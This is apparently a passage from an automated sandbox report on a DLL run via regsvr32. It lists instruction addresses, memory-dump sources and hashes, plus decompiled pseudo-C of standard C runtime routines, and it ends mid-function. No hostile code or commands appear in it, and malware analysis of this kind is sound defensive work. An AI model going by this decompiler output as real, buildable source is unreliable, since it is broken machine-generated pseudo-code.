                                                                                0x7ffa524743b8
                                                                                0x7ffa524743cd
                                                                                0x7ffa524743de
                                                                                0x7ffa524743ef
                                                                                0x7ffa52474401
                                                                                0x7ffa5247440f
                                                                                0x7ffa5247441c
                                                                                0x7ffa52474421
                                                                                0x7ffa52474429
                                                                                0x7ffa5247442e
                                                                                0x7ffa52474433
                                                                                0x7ffa5247444b
                                                                                0x7ffa52474450
                                                                                0x7ffa52474458
                                                                                0x7ffa52474463
                                                                                0x7ffa52474476
                                                                                0x7ffa5247448c
                                                                                0x7ffa524744a0
                                                                                0x7ffa524744a2
                                                                                0x7ffa524744b1
                                                                                0x7ffa524744b3
                                                                                0x7ffa524744b5
                                                                                0x7ffa524744c9
                                                                                0x7ffa524744dc
                                                                                0x7ffa524744ee
                                                                                0x7ffa524744fd
                                                                                0x7ffa52474501
                                                                                0x7ffa52474511
                                                                                0x7ffa52474517
                                                                                0x7ffa5247452c
                                                                                0x7ffa52474531
                                                                                0x7ffa52474539
                                                                                0x7ffa52474551
                                                                                0x7ffa52474558
                                                                                0x7ffa52474563
                                                                                0x7ffa52474572
                                                                                0x7ffa52474576
                                                                                0x7ffa52474586
                                                                                0x7ffa5247458c
                                                                                0x7ffa5247459f
                                                                                0x7ffa524745ca
                                                                                0x7ffa524745cc
                                                                                0x7ffa524745ce
                                                                                0x7ffa524745db
                                                                                0x7ffa524745e4
                                                                                0x7ffa524745f0
                                                                                0x7ffa524745fc
                                                                                0x7ffa52474608
                                                                                0x7ffa52474615
                                                                                0x7ffa52474622
                                                                                0x7ffa5247462f
                                                                                0x7ffa52474654
                                                                                0x7ffa5247465b
                                                                                0x7ffa5247465d
                                                                                0x7ffa52474662
                                                                                0x7ffa52474667
                                                                                0x7ffa5247466c
                                                                                0x7ffa52474671
                                                                                0x7ffa52474673
                                                                                0x7ffa52474679
                                                                                0x7ffa52474681
                                                                                0x7ffa52474683
                                                                                0x7ffa52474688
                                                                                0x7ffa5247468d
                                                                                0x7ffa52474693
                                                                                0x7ffa5247469b
                                                                                0x7ffa5247469f
                                                                                0x7ffa524746a1
                                                                                0x7ffa524746ae
                                                                                0x7ffa524746b5
                                                                                0x7ffa524746bd
                                                                                0x7ffa524746bf
                                                                                0x7ffa524746cb
                                                                                0x7ffa524746d4
                                                                                0x7ffa524746da
                                                                                0x7ffa524746e2
                                                                                0x7ffa524746e6
                                                                                0x7ffa524746e8
                                                                                0x7ffa524746f5
                                                                                0x7ffa524746f9
                                                                                0x7ffa524746fc
                                                                                0x7ffa52474704
                                                                                0x7ffa52474706
                                                                                0x7ffa52474712
                                                                                0x7ffa5247471a
                                                                                0x7ffa52474727
                                                                                0x7ffa5247472a
                                                                                0x7ffa5247472c
                                                                                0x7ffa52474732
                                                                                0x7ffa5247473a
                                                                                0x7ffa52474742
                                                                                0x7ffa5247474a
                                                                                0x7ffa52474752
                                                                                0x7ffa5247475a
                                                                                0x7ffa52474762
                                                                                0x7ffa52474767
                                                                                0x7ffa5247476f
                                                                                0x7ffa5247477b
                                                                                0x7ffa52474783
                                                                                0x7ffa52474787
                                                                                0x7ffa5247478f
                                                                                0x7ffa52474794
                                                                                0x7ffa5247479c
                                                                                0x7ffa524747a1
                                                                                0x7ffa524747a9
                                                                                0x7ffa524747b2
                                                                                0x7ffa524747ba
                                                                                0x7ffa524747c2
                                                                                0x7ffa524747ca
                                                                                0x7ffa524747d2
                                                                                0x7ffa524747d7
                                                                                0x7ffa524747d9
                                                                                0x7ffa524747e1
                                                                                0x7ffa524747e5
                                                                                0x7ffa524747e7
                                                                                0x7ffa524747ef
                                                                                0x7ffa524747f1
                                                                                0x7ffa524747f3
                                                                                0x7ffa524747fb
                                                                                0x7ffa52474800
                                                                                0x7ffa52474807
                                                                                0x7ffa5247480b
                                                                                0x7ffa5247480f
                                                                                0x7ffa52474813
                                                                                0x7ffa5247481b
                                                                                0x7ffa52474820
                                                                                0x7ffa52474828
                                                                                0x7ffa52474830
                                                                                0x7ffa52474838
                                                                                0x7ffa52474840
                                                                                0x7ffa52474845
                                                                                0x7ffa52474847
                                                                                0x7ffa5247484c
                                                                                0x7ffa52474851
                                                                                0x7ffa52474859
                                                                                0x7ffa5247485b
                                                                                0x7ffa52474869

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: BlockStateUnwind_inconsistency$ControlFromterminate$BaseDecodeEntryExceptionFunctionImageLookupPointerRaiseReadThrowValidatestd::bad_exception::bad_exceptionstd::exception::exceptiontype_info::operator==
                                                                                • String ID: bad exception$csm$csm$csm
                                                                                • API String ID: 3498492519-820278400
                                                                                • Opcode ID: e25f8e0578bfe9456fb08d8cd94b15df4ac81620a0b1491193f50dcc2ec7c96e
                                                                                • Instruction ID: d68a8f5bf1cf7aabe3f48176a1a7db2c9daf2d8e551943e3841baff8ee825e79
                                                                                • Opcode Fuzzy Hash: e25f8e0578bfe9456fb08d8cd94b15df4ac81620a0b1491193f50dcc2ec7c96e
                                                                                • Instruction Fuzzy Hash: 5D12E636A0CAC585DA709B55E8403EAB7F0FB8AB44F488136DA9D47B99DFBCD441CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247B580 Relevance: 31.8, APIs: 11, Strings: 7, Instructions: 318COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$_invalid_parameter$UpdateUpdate::~_
                                                                                • String ID: ( (_Stream->_flag & _IOSTRG) || ( fn = _fileno(_Stream), ( (_textmode_safe(fn) == __IOINFO_TM_ANSI) && !_tm_unicode_safe(fn))))$("Incorrect format specifier", 0)$((state == ST_NORMAL) || (state == ST_TYPE))$(format != NULL)$(stream != NULL)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 4023976971-2293733425
                                                                                • Opcode ID: 418e75de3b5502e14211c5140618c90997ad4f56b588356074338880c32fc633
                                                                                • Instruction ID: 0eb0018df15fb8da22abb3d5b5c5495e6d5614e82b4df161906bc1ffcf102b53
                                                                                • Opcode Fuzzy Hash: 418e75de3b5502e14211c5140618c90997ad4f56b588356074338880c32fc633
                                                                                • Instruction Fuzzy Hash: 88025E7290C6C68AE7708B14E8543AA77F4FB86344F488135D6AC46AADDFBCE546CF40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52475EA0 Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 256COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                                                • String ID: _mbstowcs_l_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbstowcs.c$s != NULL
                                                                                • API String ID: 530996419-3695252689
                                                                                • Opcode ID: 1f2dbb67bc1f08ab970a747115c78d639e8f09549dde5f83a97e8aad344e67fd
                                                                                • Instruction ID: 19b1d432ba0df062b455274afaf5457d84f7af1d90f8a9d6785ea9cff5ac811e
                                                                                • Opcode Fuzzy Hash: 1f2dbb67bc1f08ab970a747115c78d639e8f09549dde5f83a97e8aad344e67fd
                                                                                • Instruction Fuzzy Hash: DDD1183251CAC585D7609B15E84036EB7B0FB85790F088636E6AE87BE9DFBCE445CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247B090 Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 219COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                • String ID: "$"$("Buffer too small", 0)$_wctomb_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wctomb.c$sizeInBytes <= INT_MAX$sizeInBytes > 0
                                                                                • API String ID: 2192614184-1854130327
                                                                                • Opcode ID: aa152b01a59852e776b44a3c5c58d1ae4cb5e6b33e85f9a53a8f9bb433ba7f1c
                                                                                • Instruction ID: 4ce84f4a91b1e04673511f84c68a9050bf1db43f7b95567593b4ef2e92a252b8
                                                                                • Opcode Fuzzy Hash: aa152b01a59852e776b44a3c5c58d1ae4cb5e6b33e85f9a53a8f9bb433ba7f1c
                                                                                • Instruction Fuzzy Hash: 5FC1293290C68686E7709B10E8543AA73F0FB92744F588135E69D87A9ECFBCE845CF41
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247D830 Relevance: 26.5, APIs: 9, Strings: 6, Instructions: 225COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                • String ID: ("Incorrect format specifier", 0)$((state == ST_NORMAL) || (state == ST_TYPE))$(format != NULL)$(stream != NULL)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2192614184-1870338870
                                                                                • Opcode ID: 6ca64bf4fa78d85cba0345094e3509d1db8362709fbf7feea33e231a459a9eed
                                                                                • Instruction ID: 2c693d248327901a784e86a4ab3db794ac27c9b9895a2314bdbda2460ec5527c
                                                                                • Opcode Fuzzy Hash: 6ca64bf4fa78d85cba0345094e3509d1db8362709fbf7feea33e231a459a9eed
                                                                                • Instruction Fuzzy Hash: 45D1187291CA86CAE7708B10E8443AB76F0FB86349F488135D69C47A9DDBBDE445CF40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247C6D6 Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 332COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 19%
                                                                                			E00007FFA7FFA5247C6D6(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
				signed int _t223;
				signed char _t228;
				intOrPtr _t263;
				signed int _t338;
				signed int _t339;
				signed long long _t342;
				intOrPtr* _t365;
				signed long long _t390;

				_t338 = __rax;
				_a80 = _a80 | 0x00000040;
				_a72 = 0xa;
				_a72 = 0xa;
				_a116 = 0x10;
				asm("bts eax, 0xf");
				_a708 = 7;
				_a708 = 0x27;
				_a72 = 0x10;
				if ((_a80 & 0x00000080) == 0) goto 0x5247c754;
				_a84 = 0x30;
				_a85 = _a708 + 0x51;
				_a92 = 2;
				_a72 = 8;
				if ((_a80 & 0x00000080) == 0) goto 0x5247c777;
				asm("bts eax, 0x9");
				if ((_a80 & 0x00008000) == 0) goto 0x5247c79e;
				E00007FFA7FFA52471EA0( &_a1112);
				_a824 = _t338;
				goto 0x5247c84b;
				if ((_a80 & 0x00001000) == 0) goto 0x5247c7c5;
				E00007FFA7FFA52471EA0( &_a1112);
				_a824 = _t338;
				goto 0x5247c84b;
				if ((_a80 & 0x00000020) == 0) goto 0x5247c810;
				if ((_a80 & 0x00000040) == 0) goto 0x5247c7f6;
				_t339 = E00007FFA7FFA52471E40( &_a1112);
				_a824 = _t339;
				goto 0x5247c80e;
				E00007FFA7FFA52471E40( &_a1112);
				_a824 = _t339;
				goto 0x5247c84b;
				if ((_a80 & 0x00000040) == 0) goto 0x5247c834;
				E00007FFA7FFA52471E40( &_a1112);
				_a824 = _t339;
				goto 0x5247c84b;
				E00007FFA7FFA52471E40( &_a1112);
				_a824 = _t339;
				if ((_a80 & 0x00000040) == 0) goto 0x5247c882;
				if (_a824 >= 0) goto 0x5247c882;
				_a832 =  ~_a824;
				asm("bts eax, 0x8");
				goto 0x5247c892;
				_t342 = _a824;
				_a832 = _t342;
				if ((_a80 & 0x00008000) != 0) goto 0x5247c8c7;
				if ((_a80 & 0x00001000) != 0) goto 0x5247c8c7;
				_a832 = _a832 & _t342;
				if (_a116 >= 0) goto 0x5247c8d8;
				_a116 = 1;
				goto 0x5247c8f5;
				_a80 = _a80 & 0xfffffff7;
				if (_a116 - 0x200 <= 0) goto 0x5247c8f5;
				_a116 = 0x200;
				if (_a832 != 0) goto 0x5247c908;
				_a92 = 0;
				_a64 =  &_a687;
				_t223 = _a116;
				_a116 = _a116 - 1;
				if (_t223 > 0) goto 0x5247c936;
				if (_a832 == 0) goto 0x5247c9d3;
				_a1040 = _a72;
				_a816 = _t223 / _a1040 + 0x30;
				_a1048 = _a72;
				if (_a816 - 0x39 <= 0) goto 0x5247c9b2;
				_t228 = _a816 + _a708;
				_a816 = _t228;
				 *_a64 = _a816 & 0x000000ff;
				_a64 = _a64 - 1;
				goto 0x5247c915;
				_a104 = _t228;
				_a64 = _a64 + 1;
				if ((_a80 & 0x00000200) == 0) goto 0x5247ca31;
				if (_a104 == 0) goto 0x5247ca12;
				if ( *_a64 == 0x30) goto 0x5247ca31;
				_a64 = _a64 - 1;
				 *_a64 = 0x30;
				_a104 = _a104 + 1;
				if (_a108 != 0) goto 0x5247cc6e;
				if ((_a80 & 0x00000040) == 0) goto 0x5247ca95;
				if ((_a80 & 0x00000100) == 0) goto 0x5247ca63;
				_a84 = 0x2d;
				_a92 = 1;
				goto 0x5247ca95;
				if ((_a80 & 0x00000001) == 0) goto 0x5247ca7d;
				_a84 = 0x2b;
				_a92 = 1;
				goto 0x5247ca95;
				if ((_a80 & 0x00000002) == 0) goto 0x5247ca95;
				_a84 = 0x20;
				_a92 = 1;
				_a840 = _a88 - _a104 - _a92;
				if ((_a80 & 0x0000000c) != 0) goto 0x5247cad5;
				E00007FFA7FFA5247CF10(0x20, _a840, _a1088,  &_a688);
				E00007FFA7FFA5247CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
				if ((_a80 & 0x00000008) == 0) goto 0x5247cb27;
				if ((_a80 & 0x00000004) != 0) goto 0x5247cb27;
				E00007FFA7FFA5247CF10(0x30, _a840, _a1088,  &_a688);
				if (_a76 == 0) goto 0x5247cc1d;
				if (_a104 <= 0) goto 0x5247cc1d;
				_a872 = 0;
				_a848 = _a64;
				_a856 = _a104;
				_a856 = _a856 - 1;
				if (_a856 == 0) goto 0x5247cc1b;
				_a1056 =  *_a848 & 0x0000ffff;
				r9d = _a1056 & 0x0000ffff;
				r8d = 6;
				_a872 = E00007FFA7FFA5247B530( &_a860,  &_a864, _a1088);
				_a848 =  &(_a848[1]);
				if (_a872 != 0) goto 0x5247cbe5;
				if (_a860 != 0) goto 0x5247cbf2;
				_a688 = 0xffffffff;
				goto 0x5247cc1b;
				E00007FFA7FFA5247CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
				goto 0x5247cb60;
				goto 0x5247cc3b;
				E00007FFA7FFA5247CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
				if (_a688 < 0) goto 0x5247cc6e;
				if ((_a80 & 0x00000004) == 0) goto 0x5247cc6e;
				E00007FFA7FFA5247CF10(0x20, _a840, _a1088,  &_a688);
				if (_a96 == 0) goto 0x5247cc8e;
				0x52465330();
				_a96 = 0;
				goto 0x5247b99c;
				if (_a704 == 0) goto 0x5247ccb4;
				if (_a704 == 7) goto 0x5247ccb4;
				_a1060 = 0;
				goto 0x5247ccbf;
				_a1060 = 1;
				_t263 = _a1060;
				_a876 = _t263;
				if (_a876 != 0) goto 0x5247cd05;
				_t365 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
				_a32 = _t365;
				r9d = 0;
				r8d = 0x8f5;
				0x5246b3b0();
				if (_t263 != 1) goto 0x5247cd05;
				asm("int3");
				if (_a876 != 0) goto 0x5247cd61;
				0x5246ab30();
				 *_t365 = 0x16;
				_a32 = 0;
				r9d = 0x8f5;
				E00007FFA7FFA5246BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
				_a912 = 0xffffffff;
				E00007FFA7FFA52466800( &_a120);
				goto 0x5247cd80;
				_a916 = _a688;
				E00007FFA7FFA52466800( &_a120);
				return E00007FFA7FFA52463280(_a916, 2, 2, _a1064 ^ _t390, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
			}











                                                                                0x7ffa5247c6d6
                                                                                0x7ffa5247c6dd
                                                                                0x7ffa5247c6e1
                                                                                0x7ffa5247c6ee
                                                                                0x7ffa5247c6f8
                                                                                0x7ffa5247c704
                                                                                0x7ffa5247c70c
                                                                                0x7ffa5247c719
                                                                                0x7ffa5247c724
                                                                                0x7ffa5247c737
                                                                                0x7ffa5247c739
                                                                                0x7ffa5247c748
                                                                                0x7ffa5247c74c
                                                                                0x7ffa5247c756
                                                                                0x7ffa5247c769
                                                                                0x7ffa5247c76f
                                                                                0x7ffa5247c782
                                                                                0x7ffa5247c78c
                                                                                0x7ffa5247c791
                                                                                0x7ffa5247c799
                                                                                0x7ffa5247c7a9
                                                                                0x7ffa5247c7b3
                                                                                0x7ffa5247c7b8
                                                                                0x7ffa5247c7c0
                                                                                0x7ffa5247c7ce
                                                                                0x7ffa5247c7d9
                                                                                0x7ffa5247c7e8
                                                                                0x7ffa5247c7ec
                                                                                0x7ffa5247c7f4
                                                                                0x7ffa5247c7fe
                                                                                0x7ffa5247c806
                                                                                0x7ffa5247c80e
                                                                                0x7ffa5247c819
                                                                                0x7ffa5247c823
                                                                                0x7ffa5247c82a
                                                                                0x7ffa5247c832
                                                                                0x7ffa5247c83c
                                                                                0x7ffa5247c843
                                                                                0x7ffa5247c854
                                                                                0x7ffa5247c85f
                                                                                0x7ffa5247c86c
                                                                                0x7ffa5247c878
                                                                                0x7ffa5247c880
                                                                                0x7ffa5247c882
                                                                                0x7ffa5247c88a
                                                                                0x7ffa5247c89d
                                                                                0x7ffa5247c8aa
                                                                                0x7ffa5247c8bf
                                                                                0x7ffa5247c8cc
                                                                                0x7ffa5247c8ce
                                                                                0x7ffa5247c8d6
                                                                                0x7ffa5247c8df
                                                                                0x7ffa5247c8eb
                                                                                0x7ffa5247c8ed
                                                                                0x7ffa5247c8fe
                                                                                0x7ffa5247c900
                                                                                0x7ffa5247c910
                                                                                0x7ffa5247c915
                                                                                0x7ffa5247c91f
                                                                                0x7ffa5247c925
                                                                                0x7ffa5247c930
                                                                                0x7ffa5247c93b
                                                                                0x7ffa5247c95e
                                                                                0x7ffa5247c96a
                                                                                0x7ffa5247c997
                                                                                0x7ffa5247c9a9
                                                                                0x7ffa5247c9ab
                                                                                0x7ffa5247c9bf
                                                                                0x7ffa5247c9c9
                                                                                0x7ffa5247c9ce
                                                                                0x7ffa5247c9e0
                                                                                0x7ffa5247c9ec
                                                                                0x7ffa5247c9fc
                                                                                0x7ffa5247ca03
                                                                                0x7ffa5247ca10
                                                                                0x7ffa5247ca1a
                                                                                0x7ffa5247ca24
                                                                                0x7ffa5247ca2d
                                                                                0x7ffa5247ca36
                                                                                0x7ffa5247ca45
                                                                                0x7ffa5247ca52
                                                                                0x7ffa5247ca54
                                                                                0x7ffa5247ca59
                                                                                0x7ffa5247ca61
                                                                                0x7ffa5247ca6c
                                                                                0x7ffa5247ca6e
                                                                                0x7ffa5247ca73
                                                                                0x7ffa5247ca7b
                                                                                0x7ffa5247ca86
                                                                                0x7ffa5247ca88
                                                                                0x7ffa5247ca8d
                                                                                0x7ffa5247caa5
                                                                                0x7ffa5247cab5
                                                                                0x7ffa5247cad0
                                                                                0x7ffa5247caee
                                                                                0x7ffa5247cafc
                                                                                0x7ffa5247cb07
                                                                                0x7ffa5247cb22
                                                                                0x7ffa5247cb2c
                                                                                0x7ffa5247cb37
                                                                                0x7ffa5247cb3d
                                                                                0x7ffa5247cb4d
                                                                                0x7ffa5247cb59
                                                                                0x7ffa5247cb70
                                                                                0x7ffa5247cb79
                                                                                0x7ffa5247cb8a
                                                                                0x7ffa5247cb92
                                                                                0x7ffa5247cb9b
                                                                                0x7ffa5247cbb6
                                                                                0x7ffa5247cbc9
                                                                                0x7ffa5247cbd9
                                                                                0x7ffa5247cbe3
                                                                                0x7ffa5247cbe5
                                                                                0x7ffa5247cbf0
                                                                                0x7ffa5247cc11
                                                                                0x7ffa5247cc16
                                                                                0x7ffa5247cc1b
                                                                                0x7ffa5247cc36
                                                                                0x7ffa5247cc43
                                                                                0x7ffa5247cc4e
                                                                                0x7ffa5247cc69
                                                                                0x7ffa5247cc74
                                                                                0x7ffa5247cc80
                                                                                0x7ffa5247cc85
                                                                                0x7ffa5247cc8e
                                                                                0x7ffa5247cc9b
                                                                                0x7ffa5247cca5
                                                                                0x7ffa5247cca7
                                                                                0x7ffa5247ccb2
                                                                                0x7ffa5247ccb4
                                                                                0x7ffa5247ccbf
                                                                                0x7ffa5247ccc6
                                                                                0x7ffa5247ccd5
                                                                                0x7ffa5247ccd7
                                                                                0x7ffa5247ccde
                                                                                0x7ffa5247cce3
                                                                                0x7ffa5247cce6
                                                                                0x7ffa5247ccf8
                                                                                0x7ffa5247cd00
                                                                                0x7ffa5247cd02
                                                                                0x7ffa5247cd0d
                                                                                0x7ffa5247cd0f
                                                                                0x7ffa5247cd14
                                                                                0x7ffa5247cd1a
                                                                                0x7ffa5247cd23
                                                                                0x7ffa5247cd3e
                                                                                0x7ffa5247cd43
                                                                                0x7ffa5247cd53
                                                                                0x7ffa5247cd5f
                                                                                0x7ffa5247cd68
                                                                                0x7ffa5247cd74
                                                                                0x7ffa5247cd97

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: get_int64_arg$wctomb_s
                                                                                • String ID: ("Incorrect format specifier", 0)$-$9$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2984758162-268265396
                                                                                • Opcode ID: cb04687210e10a40ff2e156ef9e98a018461938d26ba5bbfa7ecca48610614c7
                                                                                • Instruction ID: 39af7d46ab4fb164243604a0a838afa6f9ec754845abf7f102bd482586d1d0b5
                                                                                • Opcode Fuzzy Hash: cb04687210e10a40ff2e156ef9e98a018461938d26ba5bbfa7ecca48610614c7
                                                                                • Instruction Fuzzy Hash: 5902E67360CAC58AE7718B14E8853AAB7F4E786740F184135E6AD86A9DDFBCE541CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA524763E0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 260COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                • String ID: "$(pwcs == NULL && sizeInWords == 0) || (pwcs != NULL && sizeInWords > 0)$P$_mbstowcs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbstowcs.c$retsize <= sizeInWords
                                                                                • API String ID: 2192614184-660564692
                                                                                • Opcode ID: 195fbd3003f3c87b3f41f90d73ab024ba3d25bb3ae880b5a9c818d30aa2f9b48
                                                                                • Instruction ID: 213f97a32b66ff47d8712bf5a4b9df3925e880c35c0c515629177ed81c7d9700
                                                                                • Opcode Fuzzy Hash: 195fbd3003f3c87b3f41f90d73ab024ba3d25bb3ae880b5a9c818d30aa2f9b48
                                                                                • Instruction Fuzzy Hash: 23E1293290CBC685E7709B14E8443AA63F1FB86794F588635D6AD52ADCDFBCE485CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA524755F0 Relevance: 24.2, APIs: 16, Instructions: 206COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 57%
                                                                                			E00007FFA7FFA524755F0(void* __ecx, long long __rcx, long long __rdx, signed int* __r8, signed int* __r9, long long _a8, void* _a16, signed int* _a24, signed int* _a32) {
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				void* _v64;
				long long _v72;
				void* _t88;
				void* _t89;
				void* _t107;
				void* _t109;
				signed int* _t158;
				signed int* _t160;
				long long _t175;
				long long _t186;
				signed int* _t187;
				signed int* _t193;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
